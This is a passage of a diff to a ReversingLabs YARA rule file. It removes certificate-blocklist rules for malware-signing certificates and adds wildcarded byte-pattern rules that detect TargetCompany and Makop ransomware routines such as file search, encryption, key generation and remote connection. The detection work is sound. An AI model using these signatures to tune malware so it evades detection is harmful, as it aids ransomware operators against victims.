+            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 EB ?? C6 06 ?? 68 ?? ?? ??
+            ?? 56 FF D3 8B 44 24 ?? 50 56 FF D3 8D 4C 24 ?? 55 51 FF 15 ?? ?? ?? ?? 8B F0 33 D2
+            83 FE ?? 0F 9F C2 8D 4C 24 ?? 8B F2 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            5D 8B C6 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" and 1581465601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $exec_proc )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9C4816D900A6Ecdbe54Adf72B19Ebcf5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Targetcompany : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TargetCompany ransomware."
 		author = "ReversingLabs"
-		id = "bd22372d-774b-5e25-b4e5-47d34fe1c40b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7e6983f9-2aca-5cfa-aad6-38aa64fa2062"
+		date = "2021-09-27"
+		modified = "2021-09-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3846-L3864"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "92e8130f444417d5bc3788721280338bbed33e3362104de0cf27bc7c1fc30d0e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.TargetCompany.yara#L1-L141"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "05fa81afa8aa1e3b9955ad24a274ddef4fb32d678902af7aae6d6c67ed3bf0fd"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TargetCompany"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Datamingo Limited" and ( pe.signatures [ i ] . serial == "00:9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" or pe.signatures [ i ] . serial == "9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" ) and 1557187200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_269174F9Fe7C6Ed4E1D19B26C3F5B35F : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "fbcf1f18-f612-5516-9a67-2564de76c456"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3866-L3882"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "95c9720d6311c2fe7026b6cac092d59967479e6c9382eac1d26f7745efa92860"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 53 68 ?? ?? ?? ?? 6A ?? 53 6A
+            ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? BF ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8D 75 ?? E8 ?? ?? ??
+            ?? 50 89 5D ?? E8 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59
+            E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 53 68
+            ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 6A ?? 5F 53 57 56 FF B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 57 52 50
+            89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 33 FF 3B F3 89 85
+            ?? ?? ?? ?? 7F ?? 7C ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 33 FF 47 EB ?? B9 ?? ??
+            ?? ?? 3B C1 73 ?? 53 51 56 FF B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 50
+        }
+		$encrypt_files_p2 = {
+            56 FF B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 89 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 3B FB 8B 3D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 FF B5 ??
+            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? ?? ?? ?? 8D 4D
+            ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 FF B5 ??
+            ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? FF D6 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 86 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 53 53 FF B5 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ??
+            ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53
+            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 01 85
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 11 85 ?? ?? ?? ?? FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 FF B5 ?? ?? ?? ?? FF D7 8B
+            BD ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ??
+            ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
+            D6 57 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? 53 56 33 F6 57 8D 5D ?? 89 75 ?? E8 ?? ?? ?? ?? 89 75 ?? 56 56 56
+            FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 3B DE 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 FF 6A ?? 8D
+            45 ?? 50 FF 74 BD ?? 53 FF 15 ?? ?? ?? ?? 47 83 FF ?? 72 ?? 56 56 6A ?? 56 56 FF 75
+            ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ??
+            B8 ?? ?? ?? ?? 0F 95 C1 56 49 23 C8 03 C8 81 C9 ?? ?? ?? ?? 51 56 56 56 FF 75 ?? 89
+            4D ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 6A ??
+            5F 8D 45 ?? 50 8D 45 ?? 50 6A ?? 53 89 7D ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            81 4D ?? ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF
+            75 ?? F7 D8 1B C0 50 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 56 56 8D 45 ??
+            50 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C7 50 FF 75 ?? E8 ?? ?? ??
+            ?? 59 59 8D 4D ?? 51 FF 75 ?? 89 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? ?? 03 7D ?? 39 75
+            ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            39 75 ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ??
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B C9 C3
+        }
+		$remote_connection_p2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 9D ?? ?? ?? ??
+            8B F9 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 45
+            ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 75
+            ?? B8 ?? ?? ?? ?? 50 8D 45 ?? 50 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F8 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 59 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 59 FF B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 5F 5E 33
+            CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$generate_key = {
+            0F 31 0F AF C8 0F AF CE 0F AF 8D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 33 FF 47 57 53 53
+            8D 85 ?? ?? ?? ?? 50 89 8D ?? ?? ?? ?? FF D6 3B C3 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 75 ?? 6A ?? 57 53 53 8D 85 ?? ?? ?? ?? 50 FF D6 3B C3 74 ?? 8D 85 ?? ?? ?? ??
+            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 59 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C7
+            B9 ?? ?? ?? ?? 8B 11 8B F2 C1 EE ?? 33 F2 69 F6 ?? ?? ?? ?? 03 F0 89 71 ?? 83 C1 ??
+            40 81 F9 ?? ?? ?? ?? 7C ?? 57 A3 ?? ?? ?? ?? FF 15
+        }
+		$find_files_p1 = {
+            8D 85 ?? ?? ?? ?? 53 53 50 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            D6 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 33 F6 0F B7
+            C6 FF 34 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 46 66 83 FE ?? 72 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 0F B7 B5 ?? ?? ?? ?? 8D 34 B5
+        }
+		$find_files_p2 = {
+            FF 36 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D3 FF 36 89 85 ?? ??
+            ?? ?? FF D3 8B 8D ?? ?? ?? ?? 3B C8 0F 84 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 66 83 BD ??
+            ?? ?? ?? ?? 72 ?? C6 85 ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? FF 34 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FE 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
+            ?? 72 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 ?? 6A ?? 59 FF B5 ?? ?? ?? ?? 33 C0
+            8B FE F3 AB 66 8B 85 ?? ?? ?? ?? 66 89 46 ?? FF D3 8D 44 00 ?? 50 E8 ?? ?? ?? ?? 59
+            FF B5 ?? ?? ?? ?? 89 46 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 EB ?? 56 FF 15 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B
+            4D ?? 5F 5E 33 CD 33 C0 5B E8 ?? ?? ?? ?? C9 C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GO ONLINE d.o.o." and pe.signatures [ i ] . serial == "26:91:74:f9:fe:7c:6e:d4:e1:d1:9b:26:c3:f5:b3:5f" and 1586386919 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_523Fb4036368Dc26192D68827F2D889B : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Makop : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Makop ransomware."
 		author = "ReversingLabs"
-		id = "bfce2ea9-cbe0-5b58-b7f8-39d2dad28db6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9b7d42f3-0417-5228-8b25-244224cbc414"
+		date = "2020-10-30"
+		modified = "2020-10-30"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3884-L3900"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f1886a046305637d335c493972560de56d8186bf99183aed5e2040b2e530fc22"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Makop.yara#L1-L99"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ff4739d32b4a775d07a5f22d551ed67025681d4986e4404c9a01ad4078468f3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Makop"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEDUZA SERVICE GROUP" and pe.signatures [ i ] . serial == "52:3f:b4:03:63:68:dc:26:19:2d:68:82:7f:2d:88:9b" and 1586847880 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_84F842F6D33Cd2F25B88Dd1710E21137 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "202593d3-d63a-5852-b680-516504d92031"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3902-L3920"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5aad8e95d1306626b63d767fce4706104330dd776b75c09cc404227863564307"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 56 8B F8 6A ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 5F 5E 5B 8B E5 5D C3 33 F6 89 74 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 8D 64 24 ??
+            66 8B 44 24 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 8B 44 24 ?? 66 85 C0
+            0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ??
+            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 8D 54 24 ?? 2B C2 D1 F8 83
+            E8 ?? 85 F6 8B F8 89 7C 24 ?? 75 ?? 8B 45 ?? 05 ?? ?? ?? ?? 03 C0 0F 84 ?? ?? ?? ??
+            50 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 8B F0 0F 84 ?? ?? ??
+            ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 38 85 FF 74 ?? 8B 1F 8D 54 24
+            ?? 8B CA 2B D9 8D 49 ?? 0F B7 04 13 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 0F
+            B7 C8 0F B7 02 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 83 C2 ?? 66 85 C9 0F B7
+            C0 74 ?? 66 3B C8 74 ?? 0F B7 D0 0F B7 C1 2B C2 0F 84 ?? ?? ?? ?? 8B 7F ?? 85 FF 75
+            ?? 8B 7D ?? 8B 55 ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8B 4D ?? 8D 5C 4E ?? BA
+            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 1C 56 8D 54 24 ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4D ?? 8D 54 08 ?? 8B 45 ?? 52 56 50 E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? E9 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ??
+            80 79 ?? ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 03 FA 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B
+            15 ?? ?? ?? ?? C6 44 24 ?? ?? 8B 7D ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8A 44
+            24 ?? 84 C0 75 ?? 8B 55 ?? 83 C7 ?? 8D 5E ?? E8 ?? ?? ?? ?? 8A 44 24 ?? 8A C8 8B 54
+            24 ?? F6 D9 1B C9 83 E1 ?? F6 D8 8B F1 8D BE ?? ?? ?? ?? 1B C0 83 E0 ?? 83 C0 ?? 03
+            45 ?? 8D 04 42 89 44 24 ?? 8D 58 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8D BE
+            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 8B 74 24 ?? 8B 45 ?? 77 ??
+            3B 70 ?? 77 ?? B1 ?? EB ?? 8B 55 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 32 C9 88 48 ?? 8B
+            4C 24 ?? F6 C1 ?? 74 ?? C6 40 ?? ?? 89 48 ?? EB ?? C6 40 ?? ?? 50 89 50 ?? 89 70 ??
+            8B 44 24 ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? EB ?? 56 6A ?? FF 15
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            8B 50 ?? 8B 00 83 EC ?? 55 8B 2D ?? ?? ?? ?? 56 57 6A ?? 8B F9 8D 4C 24 ?? 51 52 50
+            53 FF D5 85 C0 0F 84 ?? ?? ?? ?? 8B 57 ?? 8B 47 ?? 33 F6 56 8D 4C 24 ?? 51 52 50 53
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? B0 ?? 5F 5E 5D 83
+            C4 ?? C3 3B 47 ?? 73 ?? 8B C8 83 E1 ?? 74 ?? BE ?? ?? ?? ?? 2B F1 8B 4F ?? 56 03 C8
+            6A ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B 4F ?? 03 C6 50 8D 54 24 ?? 52 51 6A
+            ?? 6A ?? 89 44 24 ?? 8B 44 24 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 4C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 51 52 53 FF D5 85 C0 74 ?? 8B 4C 24 ?? 8B 57 ??
+            8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 03 CE 51 52 53 FF D7 85 C0 74 ?? 8B 44 24 ??
+            8D 0C 30 8B 44 24 ?? 3B C1 72 ?? 01 44 24 ?? 8B 44 24 ?? 8B 50 ?? 8B 00 83 54 24 ??
+            ?? 6A ?? 6A ?? 52 50 53 FF D5 85 C0 74 ?? 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52
+            53 FF D7 85 C0 74 ?? 83 7C 24 ?? ?? 0F 83 ?? ?? ?? ?? 5F 5E 32 C0 5D 83 C4 ?? C3
+        }
+		$enum_network_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8D 44 24 ?? 50 51 6A ??
+            6A ?? 57 E8 ?? ?? ?? ?? 85 C0 74 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
+            7D ?? 68 ?? ?? ?? ?? 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 52 56 8D 44 24 ?? 50 51 E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 75 ?? 8B 54 24 ?? 8B 45 ?? 52 50 EB ?? 8B 4C 24
+            ?? 8B 50 ?? 51 52 E8 ?? ?? ?? ?? 33 DB 83 C4 ?? 39 5C 24 ?? 76 ?? 83 C6 ?? 8D 49 ??
+            8B 46 ?? 85 C0 8B C8 75 ?? B9 ?? ?? ?? ?? 8B 46 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 51 8B
+            0E 51 50 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? A8 ?? 74 ?? 8B 56 ?? 85 D2 74 ?? 85 FF 7E
+            ?? 8B 45 ?? 85 C0 74 ?? 8B 40 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 83
